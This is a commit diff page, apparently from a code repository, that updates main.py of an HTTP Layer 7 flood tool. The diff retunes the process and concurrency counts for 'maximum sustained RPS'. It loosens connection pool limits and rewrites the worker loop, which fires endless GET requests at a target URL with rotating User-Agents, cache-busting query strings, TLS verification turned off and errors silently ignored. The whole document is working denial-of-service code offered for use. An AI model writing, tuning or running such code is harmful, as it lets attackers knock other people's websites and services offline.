Samuraiog committed on
Commit
cc29d57
·
verified ·
1 Parent(s): 813edd5

Update main.py

Browse files
Files changed (1) hide show
  1. main.py +28 -26
main.py CHANGED
@@ -36,14 +36,14 @@ CPU_COUNT = psutil.cpu_count(logical=True) or 8
36
  TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
37
 
38
  # OPTIMIZED configuration for maximum sustained RPS
39
- # Balance: enough workers to saturate bandwidth, not so many they block each other
40
  if CPU_COUNT >= 32:
41
- # High-core systems (32-64+ cores)
42
- MAX_PROCESSES = CPU_COUNT * 2 # 128 processes for 64 cores
43
- MAX_CONCURRENCY_PER_PROCESS = 256 # Higher concurrency
44
  elif CPU_COUNT >= 16:
45
- MAX_PROCESSES = CPU_COUNT * 3
46
- MAX_CONCURRENCY_PER_PROCESS = 384
47
  elif CPU_COUNT >= 8:
48
  MAX_PROCESSES = CPU_COUNT * 6 # 48 processes for 8 cores
49
  MAX_CONCURRENCY_PER_PROCESS = 768
@@ -51,7 +51,7 @@ else:
51
  MAX_PROCESSES = CPU_COUNT * 4
52
  MAX_CONCURRENCY_PER_PROCESS = 512
53
 
54
- STATS_BATCH_UPDATE_SIZE = 250 # Larger batches = less lock contention
55
  TOTAL_WORKERS = MAX_PROCESSES * MAX_CONCURRENCY_PER_PROCESS
56
 
57
  # --- L7 Enhanced Headers Pool ---
@@ -251,43 +251,45 @@ async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
251
  ssl_context.check_hostname = False
252
  ssl_context.verify_mode = ssl.CERT_NONE
253
 
254
- # High-performance connector settings
255
  connector = aiohttp.TCPConnector(
256
- limit=0, # Unlimited - let OS handle it
257
- limit_per_host=0,
258
  ttl_dns_cache=300,
259
  force_close=False,
260
  enable_cleanup_closed=False,
261
- keepalive_timeout=120
262
  )
263
 
264
- # Aggressive timeouts
265
- timeout = aiohttp.ClientTimeout(total=2, connect=1, sock_read=1)
266
 
267
  async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
268
  async def task_worker(worker_id):
269
- """Tight request loop."""
270
  local_counter = 0
271
- cache_base = f"?w{worker_id}="
 
 
 
 
 
272
 
273
  while not stop_event.is_set():
274
  try:
275
- # Ultra-minimal request
276
  async with session.get(
277
- f"{url}{cache_base}{local_counter}",
278
- headers={
279
- "User-Agent": random.choice(USER_AGENTS),
280
- "Connection": "keep-alive"
281
- },
282
- allow_redirects=False,
283
- timeout=timeout
284
  ) as resp:
285
- _ = resp.status
286
  local_counter += 1
 
287
  except:
288
- pass
289
 
290
- # Less frequent counter updates for speed
291
  if local_counter >= STATS_BATCH_UPDATE_SIZE:
292
  with shared_counter.get_lock():
293
  shared_counter.value += local_counter
 
36
  TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
37
 
38
  # OPTIMIZED configuration for maximum sustained RPS
39
+ # Sweet spot: 8K-16K workers for high-core systems
40
  if CPU_COUNT >= 32:
41
+ # High-core systems (32-64+ cores) - proven stable at 64 procs × 128 conc
42
+ MAX_PROCESSES = CPU_COUNT # 64 processes for 64 cores
43
+ MAX_CONCURRENCY_PER_PROCESS = 192 # Slightly higher than 128
44
  elif CPU_COUNT >= 16:
45
+ MAX_PROCESSES = CPU_COUNT * 2
46
+ MAX_CONCURRENCY_PER_PROCESS = 256
47
  elif CPU_COUNT >= 8:
48
  MAX_PROCESSES = CPU_COUNT * 6 # 48 processes for 8 cores
49
  MAX_CONCURRENCY_PER_PROCESS = 768
 
51
  MAX_PROCESSES = CPU_COUNT * 4
52
  MAX_CONCURRENCY_PER_PROCESS = 512
53
 
54
+ STATS_BATCH_UPDATE_SIZE = 200 # Optimized batch size
55
  TOTAL_WORKERS = MAX_PROCESSES * MAX_CONCURRENCY_PER_PROCESS
56
 
57
  # --- L7 Enhanced Headers Pool ---
 
251
  ssl_context.check_hostname = False
252
  ssl_context.verify_mode = ssl.CERT_NONE
253
 
254
+ # Balanced connector - controlled connection pool
255
  connector = aiohttp.TCPConnector(
256
+ limit=concurrency * 2, # 2x concurrency for pipeline
257
+ limit_per_host=concurrency * 2,
258
  ttl_dns_cache=300,
259
  force_close=False,
260
  enable_cleanup_closed=False,
261
+ keepalive_timeout=90
262
  )
263
 
264
+ # Fast but not too aggressive timeouts
265
+ timeout = aiohttp.ClientTimeout(total=3, connect=1, sock_read=2)
266
 
267
  async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
268
  async def task_worker(worker_id):
269
+ """Optimized request loop with keep-alive reuse."""
270
  local_counter = 0
271
+ req_counter = 0
272
+ headers = {
273
+ "User-Agent": random.choice(USER_AGENTS),
274
+ "Connection": "keep-alive",
275
+ "Accept": "*/*"
276
+ }
277
 
278
  while not stop_event.is_set():
279
  try:
280
+ # Reuse connections with cache busting
281
  async with session.get(
282
+ f"{url}?_={req_counter}",
283
+ headers=headers,
284
+ allow_redirects=False
 
 
 
 
285
  ) as resp:
286
+ _ = await resp.read() # Fully consume response
287
  local_counter += 1
288
+ req_counter += 1
289
  except:
290
+ req_counter += 1 # Increment even on failure
291
 
292
+ # Batch counter updates
293
  if local_counter >= STATS_BATCH_UPDATE_SIZE:
294
  with shared_counter.get_lock():
295
  shared_counter.value += local_counter